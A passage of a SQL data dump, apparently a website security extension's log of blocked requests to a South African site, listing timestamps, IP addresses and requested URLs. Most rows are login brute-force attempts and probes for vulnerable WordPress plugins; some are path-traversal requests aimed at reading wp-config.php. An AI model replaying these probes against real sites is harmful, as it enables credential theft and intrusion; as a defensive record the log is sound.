04:43:29','202.137.155.68','https://smithandsmith.co.za/wp-login.php','404shield',''),(2853,'2020-12-17 04:43:36','202.137.155.68','https://smithandsmith.co.za/wp-login.php','404shield',''),(2854,'2020-12-17 04:43:46','202.137.155.68','https://smithandsmith.co.za/wp-login.php','404shield',''),(2855,'2020-12-17 13:59:20','92.244.246.184','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2856,'2020-12-17 13:59:21','92.244.246.184','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2857,'2020-12-17 16:40:25','167.71.193.214','https://smithandsmith.co.za/wp-login.php','404shield',''),(2858,'2020-12-17 18:29:21','85.140.87.6','https://www.smithandsmith.co.za/wp-content/plugins/angwp/assets/fonts/font-awesome/css/font-awesome.min.css','404shield',''),(2859,'2020-12-17 20:07:52','175.208.191.37','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2860,'2020-12-18 04:19:02','23.228.109.146','https://smithandsmith.co.za/wp-content/plugins/super-interactive-maps/sim-wp-admin/pages/import.php','404shield',''),(2861,'2020-12-18 05:10:09','78.85.181.1','https://www.smithandsmith.co.za/wp-content/plugins/superstorefinder-wp/css/mega-superstorefinder.css','404shield',''),(2862,'2020-12-18 05:26:03','23.101.135.48','https://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2863,'2020-12-18 05:26:12','23.101.135.48','http://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','dfishield',''),(2864,'2020-12-18 05:26:28','23.101.135.48','https://www.smithandsmith.co.za/wp-content/index.php?x=ooo','404shield',''),(2865,'2020-12-18 14:03:43','23.101.135.48','https://www.smithandsmith.co.za/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','404shield',''),(2866,'2020-12-18 14:07:47','23.101.135.48','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','404shield',''),(2867,'2020-12-19 00:41:01','23.228.109.146','https://smithandsmith.co.za/wp-content/plugins/wp-symposium/server/php/index.php','404shield',''),(2868,'2020-12-19 02:45:06','23.101.135.48','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2869,'2020-12-19 03:14:08','23.101.135.48','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2870,'2020-12-19 03:41:01','80.14.27.32','https://smithandsmith.co.za/wp-login.php','404shield',''),(2871,'2020-12-19 03:41:13','80.14.27.32','https://smithandsmith.co.za/wp-login.php','404shield',''),(2872,'2020-12-19 03:41:26','80.14.27.32','https://smithandsmith.co.za/wp-login.php','404shield',''),(2873,'2020-12-19 04:06:45','178.234.41.40','https://smithandsmith.co.za/wp-login.php','404shield',''),(2874,'2020-12-19 04:06:49','178.234.41.40','https://smithandsmith.co.za/wp-login.php','404shield',''),(2875,'2020-12-19 04:06:53','178.234.41.40','https://smithandsmith.co.za/wp-login.php','404shield',''),(2876,'2020-12-19 13:42:23','23.228.109.146','https://smithandsmith.co.za/wp-content/plugins/super-interactive-maps/sim-wp-admin/pages/manage-maps.php','404shield',''),(2877,'2020-12-19 15:56:01','5.188.62.17','https://smithandsmith.co.za/wp-content/uploads/wpcf7_uploads/','404shield',''),(2878,'2020-12-20 06:22:46','23.228.109.146','https://smithandsmith.co.za/wp-content/plugins/superstorefinder-wp/css/ssf-wp-pop.css','404shield',''),(2879,'2020-12-20 12:14:30','43.252.127.245','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2880,'2020-12-20 12:16:44','103.29.196.253','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2881,'2020-12-20 12:19:47','46.190.32.223','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2882,'2020-12-20 12:21:21','64.74.216.91','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2883,'2020-12-20 12:30:14','196.49.1.5','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2884,'2020-12-20 12:36:56','103.57.254.49','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2885,'2020-12-20 12:38:44','196.49.1.6','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2886,'2020-12-20 12:43:22','196.49.1.16','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2887,'2020-12-20 12:50:33','170.78.96.2','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2888,'2020-12-20 12:54:58','196.49.1.25','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2889,'2020-12-20 12:58:56','102.67.74.1','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2890,'2020-12-20 13:02:35','122.155.46.45','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2891,'2020-12-20 13:06:00','178.18.69.13','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2892,'2020-12-20 13:11:26','94.99.211.125','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2893,'2020-12-20 13:13:53','174.93.228.214','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2894,'2020-12-20 13:18:15','185.69.24.18','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2895,'2020-12-20 13:25:03','178.18.69.13','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2896,'2020-12-20 13:25:46','120.29.97.191','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2897,'2020-12-20 13:30:54','185.69.24.18','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2898,'2020-12-20 13:33:59','206.84.72.54','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2899,'2020-12-20 13:34:48','41.176.105.84','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2900,'2020-12-20 13:36:44','92.112.233.25','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2901,'2020-12-20 13:40:59','178.18.69.13','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2902,'2020-12-20 13:44:49','170.78.96.2','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2903,'2020-12-20 13:47:13','199.192.211.30','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2904,'2020-12-20 13:54:43','199.192.211.30','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2905,'2020-12-20 15:46:45','94.232.43.193','https://smithandsmith.co.za/wp-login.php','404shield',''),(2906,'2020-12-20 15:56:20','158.255.80.210','https://smithandsmith.co.za/wp-login.php','404shield',''),(2907,'2020-12-20 15:56:20','158.255.80.210','https://smithandsmith.co.za/wp-login.php','404shield',''),(2908,'2020-12-21 00:42:09','202.80.215.253','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2909,'2020-12-21 00:58:47','103.57.254.49','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2910,'2020-12-21 01:07:07','112.210.171.118','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2911,'2020-12-21 01:12:14','177.47.224.19','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2912,'2020-12-21 01:19:05','180.251.221.221','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2913,'2020-12-21 01:28:05','123.25.102.20','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2914,'2020-12-21 01:41:10','189.196.123.48','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2915,'2020-12-21 01:44:28','191.95.139.25','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2916,'2020-12-21 01:51:03','103.78.218.213','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2917,'2020-12-21 01:55:28','36.80.231.124','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2918,'2020-12-21 01:59:12','59.98.32.143','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2919,'2020-12-21 02:05:20','167.58.21.215','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2920,'2020-12-21 02:09:41','103.57.254.49','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2921,'2020-12-21 02:19:00','14.226.228.9','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2922,'2020-12-21 02:22:16','182.57.40.69','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2923,'2020-12-21 02:26:13','171.5.176.229','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2924,'2020-12-21 02:34:16','177.227.26.105','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2925,'2020-12-21 02:36:43','174.93.228.214','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2926,'2020-12-21 02:45:57','177.249.163.210','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2927,'2020-12-21 02:47:51','117.193.46.12','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2928,'2020-12-21 02:51:18','138.121.180.38','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2929,'2020-12-21 03:04:21','137.116.116.251','https://smithandsmith.co.za/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/assets/css/dnd-upload-cf7.css','404shield',''),(2930,'2020-12-21 05:27:11','92.244.246.184','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2931,'2020-12-21 05:27:14','92.244.246.184','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2932,'2020-12-21 09:45:40','23.228.109.146','https://smithandsmith.co.za/wp-content/plugins/superlogoshowcase-wp/sls-wp-admin/pages/exportAjax.php','404shield',''),(2933,'2020-12-21 16:46:34','94.232.43.193','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2934,'2020-12-21 16:46:35','94.232.43.193','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2935,'2020-12-21 21:27:50','82.165.117.55','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','404shield',''),(2936,'2020-12-21 21:46:24','137.116.116.251','https://www.smithandsmith.co.za/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/assets/css/dnd-upload-cf7.css','404shield',''),(2937,'2020-12-21 22:01:01','82.165.117.55','https://www.smithandsmith.co.za/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','404shield',''),(2938,'2020-12-22 08:03:23','5.188.62.17','https://smithandsmith.co.za/wp-content/plugins/easy-wp-smtp/','404shield',''),(2939,'2020-12-22 08:57:56','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.css','404shield',''),(2940,'2020-12-22 14:55:22','35.201.5.248','https://smithandsmith.co.za/wp-login.php','404shield',''),(2941,'2020-12-23 02:34:11','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php','404shield',''),(2942,'2020-12-23 12:16:30','78.85.181.1','https://www.smithandsmith.co.za/wp-content/plugins/super-interactive-maps/css/mega-superstorefinder.css','404shield',''),(2943,'2020-12-23 18:24:38','88.80.35.79','https://www.smithandsmith.co.za/wp-content/plugins/angwp/assets/fonts/font-awesome/css/font-awesome.min.css','404shield',''),(2944,'2020-12-24 00:57:17','222.87.198.63','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2945,'2020-12-24 02:24:29','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/dp_evolve/js/back-end/libraries/fileuploader/upload_handler.php','404shield',''),(2946,'2020-12-24 06:31:30','92.244.246.184','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2947,'2020-12-24 13:28:08','185.81.157.136','https://www.smithandsmith.co.za/wp-content/plugins/easy-wp-smtp/','404shield',''),(2948,'2020-12-24 16:24:01','44.227.166.167','https://smithandsmith.co.za/wp-login.php','404shield',''),(2949,'2020-12-24 23:27:53','46.50.203.87','https://smithandsmith.co.za/','sessionshield',''),(2950,'2020-12-25 00:35:06','185.81.157.136','https://www.smithandsmith.co.za/wp-content/plugins/easy-wp-smtp/','404shield',''),(2951,'2020-12-25 02:10:17','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/wp-avatar/admin/uploadify/uploadify.css','404shield',''),(2952,'2020-12-25 05:25:32','203.88.155.220','https://smithandsmith.co.za/wp-login.php','404shield',''),(2953,'2020-12-25 05:25:38','203.88.155.220','https://smithandsmith.co.za/wp-login.php','404shield',''),(2954,'2020-12-25 05:25:50','203.88.155.220','https://smithandsmith.co.za/wp-login.php','404shield',''),(2955,'2020-12-25 16:16:06','185.81.157.102','https://smithandsmith.co.za/wp-admin/install.php','404shield',''),(2956,'2020-12-25 18:04:39','45.137.22.78','https://www.smithandsmith.co.za//wp-content/class.php','404shield',''),(2957,'2020-12-25 18:06:15','45.137.22.78','https://www.smithandsmith.co.za//wp-content/plugins/wp-1ogin_bak.php','404shield',''),(2958,'2020-12-25 18:06:21','45.137.22.78','https://www.smithandsmith.co.za//wp-content/wp-1ogin_bak.php','404shield',''),(2959,'2020-12-26 01:54:29','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/holding_pattern/admin/options-tab-sample.txt','404shield',''),(2960,'2020-12-26 13:11:14','116.68.152.82','https://smithandsmith.co.za/wp-login.php','404shield',''),(2961,'2020-12-26 16:35:31','82.165.52.101','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','404shield',''),(2962,'2020-12-26 19:12:20','137.116.116.251','https://smithandsmith.co.za/wp-content/themes/wp-update.php','404shield',''),(2963,'2020-12-26 19:55:34','82.165.52.101','https://www.smithandsmith.co.za/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','404shield',''),(2964,'2020-12-27 00:25:26','132.232.58.9','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2965,'2020-12-27 01:12:45','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/satoshi/styles/functions.css','404shield',''),(2966,'2020-12-27 06:57:20','198.27.103.176','https://www.smithandsmith.co.za/wp-content/plugins/easy-wp-smtp/','404shield',''),(2967,'2020-12-27 06:57:41','198.27.103.176','https://smithandsmith.co.za/wp-content/plugins/easy-wp-smtp/','404shield',''),(2968,'2020-12-27 14:18:20','137.116.116.251','https://www.smithandsmith.co.za/wp-content/themes/wp-update.php','404shield',''),(2969,'2020-12-28 02:02:26','23.228.109.146','https://smithandsmith.co.za/wp-content/plugins/nforms/file-upload/server/php/index.php','404shield',''),(2970,'2020-12-28 06:29:01','35.197.30.101','http://smithandsmith.co.za/','muashield',''),(2971,'2020-12-28 06:29:02','35.197.30.101','http://smithandsmith.co.za/','muashield',''),(2972,'2020-12-28 06:29:09','35.197.30.101','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(2973,'2020-12-28 08:31:51','35.197.30.101','http://www.smithandsmith.co.za/','muashield',''),(2974,'2020-12-28 08:31:52','35.197.30.101','http://www.smithandsmith.co.za/','muashield',''),(2975,'2020-12-28 08:31:57','35.197.30.101','http://www.smithandsmith.co.za/index.php/component/users','sessionshield',''),(2976,'2020-12-28 10:09:26','188.235.1.85','https://smithandsmith.co.za/index.php/component/users','sessionshield',''),(2977,'2020-12-28 13:11:02','188.235.1.85','https://smithandsmith.co.za/','muashield',''),(2978,'2020-12-28 13:11:03','188.235.1.85','https://smithandsmith.co.za/','muashield',''),(2979,'2020-12-28 13:11:05','188.235.1.85','https://smithandsmith.co.za/accesson2.php','muashield',''),(2980,'2020-12-28 18:06:27','64.227.39.77','https://smithandsmith.co.za/wp-login.php','404shield',''),(2981,'2020-12-28 20:28:51','149.56.173.225','https://smithandsmith.co.za/wp-content/plugins/easy-wp-smtp/','404shield',''),(2982,'2020-12-29 02:49:54','82.165.117.55','https://www.smithandsmith.co.za/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','404shield',''),(2983,'2020-12-29 12:03:43','23.228.109.146','https://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2984,'2020-12-29 14:38:04','94.232.43.193','https://smithandsmith.co.za/wp-login.php','404shield',''),(2985,'2020-12-29 17:49:24','92.244.246.184','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2986,'2020-12-30 06:23:04','78.85.181.1','https://www.smithandsmith.co.za/wp-content/plugins/super-interactive-maps/css/mega-superstorefinder.css','404shield',''),(2987,'2020-12-30 08:13:12','82.165.19.103','https://www.smithandsmith.co.za/wp-content/themes/wp-update.php','404shield',''),(2988,'2020-12-30 08:14:04','82.165.19.103','https://smithandsmith.co.za/wp-content/themes/wp-update.php','404shield',''),(2989,'2020-12-30 08:17:23','149.56.173.225','https://www.smithandsmith.co.za/wp-content/plugins/easy-wp-smtp/','404shield',''),(2990,'2020-12-30 08:49:51','185.81.157.136','https://www.smithandsmith.co.za///wp-admin/install.php','404shield',''),(2991,'2020-12-30 11:07:25','23.228.109.146','https://smithandsmith.co.za/wp-content/plugins/advanced_file_manager_5/php/connector.minimal.php','404shield',''),(2992,'2020-12-31 05:16:32','34.209.105.222','https://smithandsmith.co.za/wp-login.php','404shield',''),(2993,'2020-12-31 06:24:27','46.17.42.156','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2994,'2020-12-31 07:15:33','148.251.234.234','https://smithandsmith.co.za/wp-login.php','404shield',''),(2995,'2020-12-31 12:47:27','138.91.116.50','https://www.smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2996,'2020-12-31 20:36:41','202.137.155.193','https://smithandsmith.co.za/wp-login.php','404shield',''),(2997,'2020-12-31 20:36:51','202.137.155.193','https://smithandsmith.co.za/wp-login.php','404shield',''),(2998,'2020-12-31 20:37:00','202.137.155.193','https://smithandsmith.co.za/wp-login.php','404shield',''),(2999,'2021-01-01 09:08:00','52.64.20.252','https://smithandsmith.co.za/wp-login.php','404shield',''),(3000,'2021-01-01 10:26:44','115.84.99.72','https://smithandsmith.co.za/wp-login.php','404shield',''),(3001,'2021-01-01 10:27:01','115.84.99.72','https://smithandsmith.co.za/wp-login.php','404shield',''),(3002,'2021-01-01 10:27:21','115.84.99.72','https://smithandsmith.co.za/wp-login.php','404shield',''),(3003,'2021-01-01 12:58:58','138.91.116.50','https://www.smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(3004,'2021-01-02 11:18:20','149.56.173.225','https://smithandsmith.co.za/wp-content/plugins/easy-wp-smtp/','404shield',''),(3005,'2021-01-02 15:10:26','95.174.110.235','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(3006,'2021-01-02 17:00:10','46.163.73.81','https://smithandsmith.co.za/wp-login.php','404shield',''),(3007,'2021-01-02 21:35:38','67.213.221.18','https://smithandsmith.co.za/wp-login.php','404shield',''),(3008,'2021-01-02 21:35:40','67.213.221.18','https://smithandsmith.co.za/wp-login.php','404shield',''),(3009,'2021-01-02 21:35:42','67.213.221.18','https://smithandsmith.co.za/wp-login.php','404shield',''),(3010,'2021-01-03 18:03:56','62.210.113.228','https://smithandsmith.co.za/wp-login.php','404shield',''),(3011,'2021-01-03 18:03:56','62.210.113.228','https://smithandsmith.co.za/wp-login.php','404shield',''),(3012,'2021-01-03 20:45:57','113.161.88.235','https://smithandsmith.co.za/wp-login.php','404shield',''),(3013,'2021-01-03 20:46:16','113.161.88.235','https://smithandsmith.co.za/wp-login.php','404shield',''),(3014,'2021-01-03 20:46:41','113.161.88.235','https://smithandsmith.co.za/wp-login.php','404shield',''),(3015,'2021-01-04 07:48:35','51.89.255.201','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=_ning_upload_image','404shield',''),(3016,'2021-01-04 18:31:11','2.119.45.57','https://smithandsmith.co.za/wp-login.php','404shield',''),(3017,'2021-01-04 18:31:15','2.119.45.57','https://smithandsmith.co.za/wp-login.php','404shield',''),(3018,'2021-01-04 18:31:20','2.119.45.57','https://smithandsmith.co.za/wp-login.php','404shield',''),(3019,'2021-01-05 00:23:58','178.216.232.173','https://smithandsmith.co.za/wp-login.php','404shield',''),(3020,'2021-01-05 00:24:10','178.216.232.173','https://smithandsmith.co.za/wp-login.php','404shield',''),(3021,'2021-01-05 00:24:14','178.216.232.173','https://smithandsmith.co.za/wp-login.php','404shield',''),(3022,'2021-01-05 04:47:10','194.61.24.94','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=_ning_upload_image','404shield',''),(3023,'2021-01-05 10:09:52','192.169.244.239','https://smithandsmith.co.za/wp-login.php','404shield',''),(3024,'2021-01-05 19:30:39','61.244.70.248','https://smithandsmith.co.za/wp-login.php','404shield',''),(3025,'2021-01-05 22:08:47','51.89.255.201','https://www.smithandsmith.co.za/wp-admin/admin-ajax.php?action=_ning_upload_image','404shield',''),(3026,'2021-01-06 02:21:00','202.137.154.125','https://smithandsmith.co.za/wp-login.php','404shield',''),(3027,'2021-01-06 02:21:09','202.137.154.125','https://smithandsmith.co.za/wp-login.php','404shield',''),(3028,'2021-01-06 02:21:33','202.137.154.125','https://smithandsmith.co.za/wp-login.php','404shield',''),(3029,'2021-01-06 03:59:35','203.95.212.99','https://smithandsmith.co.za/wp-login.php','404shield',''),(3030,'2021-01-06 03:59:41','203.95.212.99','https://smithandsmith.co.za/wp-login.php','404shield',''),(3031,'2021-01-06 03:59:47','203.95.212.99','https://smithandsmith.co.za/wp-login.php','404shield',''),(3032,'2021-01-06 05:59:34','92.244.246.184','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3033,'2021-01-06 05:59:48','92.244.246.184','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3034,'2021-01-06 08:26:08','92.244.246.184','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3035,'2021-01-06 10:06:33','188.163.89.134','http://smithandsmith.co.za/administrator/','adminpw',''),(3036,'2021-01-06 17:57:34','54.37.21.211','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3037,'2021-01-07 01:55:45','195.81.64.102','https://smithandsmith.co.za/wp-login.php','404shield',''),(3038,'2021-01-07 01:55:47','195.81.64.102','https://smithandsmith.co.za/wp-login.php','404shield',''),(3039,'2021-01-07 01:55:50','195.81.64.102','https://smithandsmith.co.za/wp-login.php','404shield',''),(3040,'2021-01-07 13:14:17','188.163.89.73','http://smithandsmith.co.za/administrator/','adminpw',''),(3041,'2021-01-08 05:12:53','103.1.179.162','https://smithandsmith.co.za/wp-login.php','404shield',''),(3042,'2021-01-08 16:03:15','191.102.120.63','https://smithandsmith.co.za/wp-login.php','404shield',''),(3043,'2021-01-08 16:03:33','191.102.120.63','https://smithandsmith.co.za/wp-login.php','404shield',''),(3044,'2021-01-08 16:03:40','191.102.120.63','https://smithandsmith.co.za/wp-login.php','404shield',''),(3045,'2021-01-09 05:57:47','202.137.155.94','https://smithandsmith.co.za/wp-login.php','404shield',''),(3046,'2021-01-09 05:57:57','202.137.155.94','https://smithandsmith.co.za/wp-login.php','404shield',''),(3047,'2021-01-09 05:58:18','202.137.155.94','https://smithandsmith.co.za/wp-login.php','404shield',''),(3048,'2021-01-09 08:10:41','80.15.39.135','https://smithandsmith.co.za/wp-login.php','404shield',''),(3049,'2021-01-09 08:10:48','80.15.39.135','https://smithandsmith.co.za/wp-login.php','404shield',''),(3050,'2021-01-09 08:10:53','80.15.39.135','https://smithandsmith.co.za/wp-login.php','404shield',''),(3051,'2021-01-10 07:01:39','185.8.10.230','https://smithandsmith.co.za/wp-login.php','404shield',''),(3052,'2021-01-10 15:37:11','213.32.91.71','https://smithandsmith.co.za/wp-login.php','404shield',''),(3053,'2021-01-10 15:37:11','213.32.91.71','https://smithandsmith.co.za/wp-login.php','404shield',''),(3054,'2021-01-11 05:35:53','13.209.28.104','https://smithandsmith.co.za/wp-login.php','404shield',''),(3055,'2021-01-11 05:35:55','13.209.28.104','https://smithandsmith.co.za/wp-login.php','404shield',''),(3056,'2021-01-11 06:57:47','41.33.229.210','https://smithandsmith.co.za/wp-login.php','404shield',''),(3057,'2021-01-11 06:57:50','41.33.229.210','https://smithandsmith.co.za/wp-login.php','404shield',''),(3058,'2021-01-11 06:57:53','41.33.229.210','https://smithandsmith.co.za/wp-login.php','404shield',''),(3059,'2021-01-11 13:06:18','142.93.253.189','https://smithandsmith.co.za/wp-login.php','404shield',''),(3060,'2021-01-11 17:06:47','202.137.154.31','https://smithandsmith.co.za/wp-login.php','404shield',''),(3061,'2021-01-11 17:06:57','202.137.154.31','https://smithandsmith.co.za/wp-login.php','404shield',''),(3062,'2021-01-11 17:07:07','202.137.154.31','https://smithandsmith.co.za/wp-login.php','404shield',''),(3063,'2021-01-12 01:48:36','208.3.194.36','https://smithandsmith.co.za/wp-login.php','404shield',''),(3064,'2021-01-12 11:23:16','78.85.178.153','https://www.smithandsmith.co.za/wp-content/plugins/superlogoshowcase-wp/css/super-logo-showcase.css','404shield',''),(3065,'2021-01-12 18:39:08','208.109.14.39','https://smithandsmith.co.za/wp-login.php','404shield',''),(3066,'2021-01-12 20:32:31','34.83.189.169','https://smithandsmith.co.za/wp-content/plugins/apikey/apikey.php?test=hello','404shield',''),(3067,'2021-01-12 20:33:05','34.83.189.169','https://smithandsmith.co.za/wp-content/plugins/apikey/apikey.php.suspected?test=hello','404shield',''),(3068,'2021-01-14 20:38:55','46.105.102.68','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3069,'2021-01-14 21:36:35','192.99.10.26','https://smithandsmith.co.za/wp-login.php','404shield',''),(3070,'2021-01-14 22:47:49','5.130.72.125','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(3071,'2021-01-15 00:40:58','128.199.21.230','https://smithandsmith.co.za/wp-login.php','404shield',''),(3072,'2021-01-15 08:43:04','89.232.34.130','https://smithandsmith.co.za/wp-login.php','404shield',''),(3073,'2021-01-15 08:43:07','89.232.34.130','https://smithandsmith.co.za/wp-login.php','404shield',''),(3074,'2021-01-15 08:43:11','89.232.34.130','https://smithandsmith.co.za/wp-login.php','404shield',''),(3075,'2021-01-15 11:56:39','34.241.77.13','https://smithandsmith.co.za/wp-login.php','404shield',''),(3076,'2021-01-15 11:56:39','34.241.77.13','https://smithandsmith.co.za/wp-login.php','404shield',''),(3077,'2021-01-15 20:39:55','178.62.98.38','https://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(3078,'2021-01-15 20:40:03','178.62.98.38','http://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','dfishield',''),(3079,'2021-01-15 20:40:18','178.62.98.38','https://www.smithandsmith.co.za/wp-content/index.php?x=ooo','404shield',''),(3080,'2021-01-16 00:13:59','41.33.229.210','https://smithandsmith.co.za/wp-login.php','404shield',''),(3081,'2021-01-16 00:14:02','41.33.229.210','https://smithandsmith.co.za/wp-login.php','404shield',''),(3082,'2021-01-16 00:14:06','41.33.229.210','https://smithandsmith.co.za/wp-login.php','404shield',''),(3083,'2021-01-16 06:00:26','52.64.20.252','https://smithandsmith.co.za/wp-login.php','404shield',''),(3084,'2021-01-16 06:00:27','52.64.20.252','https://smithandsmith.co.za/wp-login.php','404shield',''),(3085,'2021-01-17 08:15:26','115.84.99.72','https://smithandsmith.co.za/wp-login.php','404shield',''),(3086,'2021-01-17 08:15:38','115.84.99.72','https://smithandsmith.co.za/wp-login.php','404shield',''),(3087,'2021-01-17 08:15:50','115.84.99.72','https://smithandsmith.co.za/wp-login.php','404shield',''),(3088,'2021-01-17 13:23:57','217.160.42.180','http://smithandsmith.co.za/','muashield',''),(3089,'2021-01-17 13:23:58','217.160.42.180','http://smithandsmith.co.za/','muashield',''),(3090,'2021-01-17 13:23:59','217.160.42.180','http://smithandsmith.co.za/','muashield',''),(3091,'2021-01-18 05:05:58','46.45.178.5','https://smithandsmith.co.za/wp-login.php','404shield',''),(3092,'2021-01-18 11:51:53','34.230.156.67','https://smithandsmith.co.za/wp-login.php','404shield',''),(3093,'2021-01-18 11:51:55','34.230.156.67','https://smithandsmith.co.za/wp-login.php','404shield',''),(3094,'2021-01-18 12:35:14','94.102.63.27','https://smithandsmith.co.za/wp-content/themes/bridge/css/dripicons/fonts/MARKET','404shield',''),(3095,'2021-01-18 12:35:15','94.102.63.27','https://smithandsmith.co.za/wp-content/themes/bridge/css/dripicons/fonts/MARKET','404shield',''),(3096,'2021-01-18 13:50:14','54.39.16.153','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3097,'2021-01-19 03:09:21','199.229.250.98','https://smithandsmith.co.za/wp-login.php','404shield',''),(3098,'2021-01-19 03:09:24','199.229.250.98','https://smithandsmith.co.za/wp-login.php','404shield',''),(3099,'2021-01-19 03:09:29','199.229.250.98','https://smithandsmith.co.za/wp-login.php','404shield',''),(3100,'2021-01-19 14:44:53','216.10.251.112','https://smithandsmith.co.za/wp-login.php','404shield',''),(3101,'2021-01-20 06:57:05','45.15.143.183','https://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(3102,'2021-01-20 07:09:35','45.15.143.183','https://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(3103,'2021-01-20 07:09:43','45.15.143.183','http://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','dfishield',''),(3104,'2021-01-20 07:09:58','45.15.143.183','https://smithandsmith.co.za/wp-content/index.php?x=ooo','404shield',''),(3105,'2021-01-20 17:07:58','87.252.226.79','https://smithandsmith.co.za/wp-login.php','404shield',''),(3106,'2021-01-20 17:07:58','87.252.226.79','https://smithandsmith.co.za/wp-login.php','404shield',''),(3107,'2021-01-21 02:07:00','188.163.89.135','http://smithandsmith.co.za/administrator/','adminpw',''),(3108,'2021-01-21 02:56:28','3.8.68.2','https://smithandsmith.co.za/wp-login.php','404shield',''),(3109,'2021-01-21 02:56:29','3.8.68.2','https://smithandsmith.co.za/wp-login.php','404shield',''),(3110,'2021-01-21 08:47:02','188.165.239.211','https://smithandsmith.co.za/wp-login.php','404shield',''),(3111,'2021-01-21 